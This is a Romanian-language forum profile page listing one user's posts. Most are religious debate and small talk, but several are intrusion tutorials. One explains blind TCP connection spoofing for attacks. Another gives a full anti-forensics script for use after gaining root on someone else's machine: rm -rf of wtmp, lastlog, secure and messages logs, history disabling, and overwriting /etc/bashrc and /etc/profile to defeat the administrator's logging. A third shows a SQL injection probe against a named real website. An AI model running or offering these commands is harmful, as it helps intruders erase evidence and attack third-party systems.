Jump to content

a13x4nd7u

Active Members
  • Posts

    323
  • Joined

  • Last visited

  • Days Won

    2

Everything posted by a13x4nd7u

  1. Se muta de sus de la thread tools, move.
  2. Vrei sa faci ca si cum un calculator s-a conectat la un anumit site/server TCP? Raspunsul la intrebare este insusi acest post, dar o sa mai explic si alte mici parti ale conexiunilor TCP (adica folosind protocolul TCP), adica majoritatea conexiunilor. Acest post explica baza unei conexiuni (desi multi fac programe prin care un client se conecteaza la server fara sa stie de fapt ce se intampla). Nu este mare lucru, dar ideea de baza de aici poate fi folosita pentru a face atacuri complexe si efective. In mod normal pentru ca sa faci o conexiune TCP/IP trebuie sa trimiti un pachet SYN, sa primesti unul SYN+ACK si sa o inchizi cu ACK. Noi nu avem cum sa primim SYN+ACK ca sa "inchidem" conexiunea. Poate va intrebati "Ce este asa de important in acel pachet?" Raspunsul este acknowledgment number (care este important doar daca primim ACK), un numar pe care trebuie sa il trimitem inapoi ca sa aratam ca noi suntem cu adevarat calculatorul care a trimis cererea de conexiune. Dar, folosind wireshark oricine poate observa ca acel numar este aproape intotdeauna 1. Asa ca putem face acest lucru usor. 1. Folosind ip-ul victimei si portul X tu trimiti un pachet cu care arati ca vrei sa faci o conexiune noua (SYN). 2. Trimitem pachetul cu SYN+ACK aproape imediat (nu vrem sa ajunga primul, pentru ca desi rar, se mai intampla). 3. Dupa aceea putem trimite de exemplu cererea unei pagini cu un pachet simplu si date: "GET /index.html HTTP/1.1" . Dupa aceste 3 pachete TCP/IP victima o sa primeasca pe portul X un pachet SYN+ACK (cel pe care noi l-am ghicit) si continutul paginii index.html de pe serverul pe care am deschis noi conexiunea si poate si alte pachete ca RST (in cazul in care serverul vrea sa reseteze conexiunea) sau FIN+ACK in cazul in care vrea sa o inchida (asta se intampla la serverele web, serverul vrand sa inchida conexiunea imediat dupa ce a trimis continutul paginii). Ca sa nu las oarecum neterminat (pentru ca orice conexiune se si inchide) o sa incerc sa explic si cum se inchide o conexiune. Acest lucru este un pic mai complicat (si nu o sa poti ghici asa de usor acknowledgement number). Notam calculatorul care vrea sa inchida conexiunea cu A si pe celalalt cu B. A ii trimite lui B FIN+ACK; B ii trimite lui A ACK; B ii trimite lui A FIN+ACK; A ii trimite lui B ACK. Dar dupa ce te-ai conectat nu mai poti ghici acknowlidgement number ca sa inchizi conexiunea. (cel putin eu nu am reusit) Este facut de mine de la 0 din ceea ce am citit pe wikipedia, dar am mai folosit si wireshark ca sa observ reteaua, netul sau simple programe ale mele. Astept pareri.
  3. Da! Bani falsi!
  4. Ai dreptate, ar trebui sa fac si tutoriale mai usoare despre Linux. Daca ai idei, spune-mi. Cred ca in curand o sa postez si despre socketuri linux in C. E simplu si frumos. EDIT: Multumesc!
  5. Asta pot sa fac eu pentru linux. Server si client de chat cu nickname, trimite pe net folosind criptare blowfish. Totul in C sau C++ (dar prefer C). Imi ia ceva timp, si nu am chef sa fac singur asta. Si eu cred ca avem dreptul la intimitate. EDIT: Pot sa folosesc in loc de blowfish criptare facuta de mine, sau sa combin criptarea blowfish cu a mea.
  6. Inamicul nr1 al rst rullz? // No comment. )) EDIT: In locul lui as intra pe Windows 98 si mi-as da Ping of Death ca sa apara vesnicul ecran verde. EDIT2: Site-ul are si search: No posts found. Try a different search? Warning: include() [function.include]: Unable to access /data/hosting/cocalari.com/www/wp-content/themes/iepurasul/searchform.php in /data/hosting/cocalari.com/www/wp-content/themes/iepurasul/search.php on line 53 Warning: include(/data/hosting/cocalari.com/www/wp-content/themes/iepurasul/searchform.php) [function.include]: failed to open stream: No such file or directory in /data/hosting/cocalari.com/www/wp-content/themes/iepurasul/search.php on line 53 Warning: include() [function.include]: Failed opening '/data/hosting/cocalari.com/www/wp-content/themes/iepurasul/searchform.php' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /data/hosting/cocalari.com/www/wp-content/themes/iepurasul/search.php on line 53
  7. In acest post o sa incerc sa raspund la intrbarea "Cum si unde se pot gasi logurile pe Linux, si cum le pot sterge daca intru pe un root?". Daca aveti completari va rog sa le postati. Acest script este pentru cei care stiu macar comenzile de baza de pe Linux. Pentru a raspunde la aceasta intrebare trebuie sa va spun ca la fiecare pornire, fiecare program linux executa niste comenzi. Ele se gasesc in "/etc/*rc.rc", "/etc/*rc", /cale_catre_user_sau_root/.*rc si/sau /cale_catre_user_sau_root/.* . De exemplu, cand deschizi bash se executa: "/etc/bashrc" sau "/etc/bash.bashrc" "/etc/profile" "/etc/bash_completion" "/cale_catre_user_sau_root/.profile" "/cale_catre_user_sau_root/.bashrc" Asa ca daca intram pe un user/root pe un alt calculator va trebui sa ne uitam si aici deoarece administratorul poate adauga intr-unul dintr-aceste fisiere un script care sa mai faca un log sau sa trimita un mail. De exemplu, codul urmator adaugat la unul dintre acele fisiere o sa arate ca ai executat bash (sau te-ai logat) la data, ora, ce conturi mai erau folosite in momentul logarii, ce conexiuni cu alte calculatoare mai sunt in acel moment: echo "`whoami` `hostname` `date` `who` `netstat -a`" > locatie_log O mica observatie: In loc de log se poate face un script care de fiecare data cand cineva intra pe root sa ii trimita mail. Administratorul poate face si altceva: sa nu adauge absolut nimic in niciunul din fisierele de mai sus, dar sa se foloseasca de crond, care poate rula anumite scripturi la o anumita pedioada de timp. Scripturile "/etc/crontab" si "/etc/anacrontab" sunt scripturi in care se arata in ce foldere se vor gasi scripturile care vor fi rulate odata pe zi, o data pe saptamana, etc.. Pe un sistem care are crond pornit si scripturile nemodificate se vor gasi in folderele "/etc/cron.d", "/etc/cron.hourly", "/etc/cron.daily", "/etc/cron.weekly", "/etc/cron.monthly" scripturi care vor fi executate la anumite perioade de timp, dupa cum sugereaza si numele folderelor. In folderul "/etc/cron.d" pot fi executate comenzi la orice alta perioada de timp, perioada care este definita in fisierele dinauntru. Pentru a fi siguri ca au fost sterse toate logurile uitati-va si in "/etc/syslog.conf" ca sa vedeti unde sunt celelalte loguri create de syslogd (asta doar in cazul in care syslogd este pornit). In "syslog.conf" vedeti si multe alte locuri ale logurilor de pe linux care trebuiesc sterse pe care nu am putut sa le arat aici. Dar ca model o sa va arat comenzile care trebuiesc folosite pentru a sterge un log XXX: rm -rf /cale_catre_log/XXX touch /cale_catre_log/XXX Mai pot fi si alte programe care logheaza activitatea pe un sistem (care sunt folosite mai rar, adica nu am avut parte de niciunul dintre ele). De exemplu: tuxlog, Xlog, svlogd, etc.. Pentru a sterge toate logurile dintr-un sistem trebuie sa va uitati la procese si sa vedeti ce procese de logare are (asta daca nu le-a modificat numele, astfel devenind greu observabile). Pentru a vedea toate procesele care ruleaza pe un calculator care are Linux executati comanda: ps -A Urmatorul cod trebuie executat imediat dupa logarea ca root, in folderul de root (contine parti din Illusion): rm -rf .bash_history rm -rf /var/run/utmp rm -rf /var/run/wtmp rm -rf /var/log/lastlog rm -rf /usr/adm/lastlog rm -rf .bash_history rm -rf /var/log/wtmp rm -rf /var/log/secure rm -rf /var/log/lastlog rm -rf /var/log/messages touch /var/log/messagess touch /var/log/wtmp touch /var/log/secure touch /var/log/lastlog rm -rf /root/.bash_history touch /root/.bash_history Inainte sa iesi executi urmatoarele comenzi: rm -rf .bash_history rm -rf /var/run/utmp rm -rf /var/run/wtmp - rm -rf /var/log/lastlog rm -rf /usr/adm/lastlog rm -rf .bash_history cd /var/log/ rm -rf wtmp rm -rf secure rm -rf lastlog rm -rf messages touch messagess touch wtmp touch secure touch lastlog rm -rf /root/.bash_history touch /root/.bash_history unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG;export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 Daca ati gasit scripturi care logheaza puteti folosi codul urmator care rescrie bashrc si .bashrc pentru a fi siguri ca nu va mai loga nimic data viitoare: if [ -f /etc/bashrc ]; then echo "PS1='\u@\h:\w#'" > /etc/bashrc fi if [ -f /etc/bash.bashrc ]; then echo "PS1=\'\\u@\\h:\\w#\'" > /etc/bash.bashrc fi echo "PATH=\"/usr/local/sbin:/usr/local/bin:/bin" > /etc/profile echo ":/sbin:/usr/bin:/usr/sbin\"\nexport PATH\n\numask 022" >> /etc/profile echo "export PS1=\'\h:\w:\$\'\n umask 022" > .bashrc echo "if [ -f /etc/bashrc ]; then\n. ~/.bashrc\nfi" > .profile Am considerat log important si ceea ce poate fi executat la pornirea bash pentru ca poate scrie pe hard multe despre cel care s-a logat si tocmai s-a apucat sa foloseasca bash (user, data, ora, IP, MAC, ... - depinde de script). Concluzia: ========== Daca intrati in calculator trebuie sa aveti in vedere ca un administrator priceput poate adauga niste loguri ascunse sau modifica locatiile prestabilite, logurile fiind greu de gasit. Chiar daca stergeti logurile intrati pe root numai cu un proxy, ssh tunnelling, etc.. Daca as fi administrator si as vrea sa fiu al dracu' as pune scriptul de logare in "/etc/bash_completion" pentru ca acolo e atata cod ca nu se uita nimeni si poti ascunde usor o linie de cod care logheaza. Acest post contine parti din Illusion de pe Packet Storm Seucrity. Stiu ca s-a mai postat ceva asemanator aici, motiv pentru care m-am inspirat si de acolo pentru ca sa am un post cat mai complet. By a13x4nd7u. EDIT: Si daca aveti intrebari va rog sa le puneti.
  8. Poate ajuta: http://www.compass.ro/ro/sectiune.php?s=253+and+select+*+from+* Query failed: SELECT nume, titlu, continut, nume_fisier, ultima_actualizare, title, keywords, description FROM ro_sectiuni WHERE ID_sec = 253 and select * from *
  9. Sau cauta pe google, pe forum si dupa aia intreaba pe forum.
  10. Budha a atins nirvana, nu e Dumnezeu pentru ei, ci doar primul om care a trecut prin niste "teste" si a ajuns la nirvana. Deci nu prea vad legatura dintre natura lui Dumnezeu si religia budista.
  11. Acum l-am pus si cel de la javascript: W3Schools JAVASCRIPT Quiz Result: 18 of 20 90% You can be proud of yourself! Time Spent 3:46 Dar astea sunt prea simple.
  12. a13x4nd7u

    somaj

    Ai putea sa inveti sa scrii corect? Pana sa imi dau seama ce ai zis mi-a luat 2 minute. Trebuia sa scrii: "Salut! Am muncit 3 luni la o firma si as vrea sa stiu daca pot intra in somaj. Am auzit de la unii ca se poate intra in somaj, iar de la altii ca nu se poate intra in somaj. Voi stiti ceva?" Multumesc
  13. Sa stii ca si tu ai dreptate, dar motivele sunt pentru tine. Adica eu aleg tot cum am fost inainte, sa nu cred in Dumnezeu.
  14. De ce ai alege sa crezi in Dumnezeu (al crestinilor ortodocsi) si nu in alta religie? Asta e intrebarea. Si mai toti oameni din alte timpuri au crezut in zei. De ce sa nu se repete. Si stii ca intr-un timp erau mai multi budisti decat crestini, si poate la fel este si acum. De ce sa alegi crestinismul? Normal ca sunt crescut si obisnuit cu el, dar nu este cea mai buna optiune, ci asa mi se poate parea mie pentru ca sunt aici, asa cum li se poate parea si celor din Occident budismul. Nu conteaza numarul celor care cred intr-un lucru sau Dumnezeu, ci conteaza ca tu crezi.
  15. Nu m-ar deranja sa mor nici acum. Singurul meu regret este ca i-as face pe cei care tin la mine sa sufere (nu o sa mai fiu) si ca am lasat unele lucruri neterminate. Dar nu ma deranjeaza. Si nu ca vreau sa mor, ci doar sunt impacat cu moartea. Cred ca indiferent ce va fi dupa va fi la fel de bine daca nu mai bine. Daca nu este nimic atunci tot bine e, pentru ca macar un pic am ajutat oamenii in viata mea. Apropo, nu cred ca daca nu crezi in Dumnezeu trebuie sa fii rau, ci sa fii bun. EDIT: Si de fapt cred ca nu toti pot fi fericiti atunci cand stiu a vor muri intr-o perioada scurta de timp, si daca as sti ca cineva va muri intr-o perioada de timp i-as spune. Dar ideea este ca de multe ori poti considera minciuna un lucru bun. Nu ai de unde sa stii cum va reactiona si iti poate parea rau.
  16. Pentru cine a fost asta? Daca a fost pentru mine... Scuza-ma, dar incerc sa gandesc.
  17. Nu am o parere buna despre Becali. Atunci sa zicem ca vrei sa crezi in Dumnezeu. Si Dumnezeu a zis prin Mantuitorul ca poruncile au fost date de EL lui Moise pe muntele Sinai. Printre porunci se afla sa nu minti. Si cunosti un om pe moarte pentru care poate ca ar fi mai bine sa nu stie ca va muri si sa moara fericit, pe cand altfel va putea muri disperat, fricos, speriat de moarte si de faptul ca a trait putin. Adica mai bine minti oamenii atunci cand e nevoie. Adica contrazici poruncile, Biblia, cuvantul Domnului pentru a face un bine. Deci nu exista. Iar cu ce era inainte era pentru ca poate tu nu ai de ce sa crezi in Dumnezeu, dar poate crezi in posibilitatea sa existe rai si iad. Si te "obliga" sa crezi.
  18. Vezi ca am vazut asta si la altii (nu dau nume dar incerci linkurile). Si am ales ca nu am nimic de ascuns. EDIT: Adica mi-am dat seama ca cineva ar putea sa afle numele meu.
  19. Poti spune ca desi Dumnezeu ne da liberul arbitru si ne spune ca exista iad si rai si ne spune sa alegem de fapt nu ne da nimic de ales. Cat de prost sa fii sa alegi iadul? (no offence pentru nimeni) Poti spune ca vrea sa ne sperie cu felul in care arata iadul si sa ne oblige prin faptul ca noi am fost prosti si l-am crezut sa facem asa cum zice El. De fapt vrea ca daca suntem slabi sa ne controleze. Nu vezi ca Becali si altii se folosesc de religie? EDIT: Adica de fapt alti oameni (de cand a fost creata aceasta religie pana acum) se folosesc de cei care cred. Ce trebuie subliniat este ca in toate religiile si in tot este vorba in majoritatea timpului de oameni si numai oameni. Sper ca intelegi punctul meu de vedere.
  20. Cred ca te inseli... )) Uite-l pe-al meu: http://www.phonerator.com/en/c/?v%5B%5D=no&v%5B%5D=way&Submit=Find+Out%21
  21. Poate nu e vulnerabil.
  22. Am lasat niste commenturi la tine pe blog. Daca crezi cu adevarat in Biblie si Dumnezeu si o sa poti demonstra ca nu e asa cum am spus eu, atunci asta iti va intari credinta. Altfel, nu mai incerca sa convingi pe altii cu ceea ce nu crezi nici tu.
  23. Fiecare cu calea lui. PS: Nu vorbeam numai de Biblie. Am luat la rand toate religiile importante cu scrierile ei si mi-am demonstrat mie ca nu pot fi adevarate. Dar asta nu inseamna ca Dumnezeu nu exista. Si fiecare religie are ceva adevarat. EDIT: Nu putem gandi pe Biblie.
  24. Ontopic: Eu nu cred in nicio religie pentru ca nu merita, pentru ca vor sa iti dea tie de-a gata calea, care nu este chiar cea adevarata. Fiecare religie are oameni care chiar cred in religiile respective pentru ca asa cred ei ca e bine (si pentru ca fiecare religie are lucruri bune pe care le scoate in fata). Multi oameni sunt cred sincer. Nu toti sunt prosti, sunt doar oameni care vor ce cred ei ca e bine. Dar ideile se bat cap in cap. Pentru ca sa diferentieze binele de rau, pentru ca sa explice aparitia lumii, pentru ca oamenii sa aiba o cale si sa stie de ce traiesc, oamenii au creat religiile. Fiecare are ceva special, adevarat, dar si parti rele. Eu imi urmez propria cale, cu bune si rele, nu merg pe urmele unor zei falsi sau alte alea. Totul poate fi demonstrat, dar nu merita. Cine gandeste, isi poate da seama ca e adevarat.
  25. Foarte tare. )
×
×
  • Create New...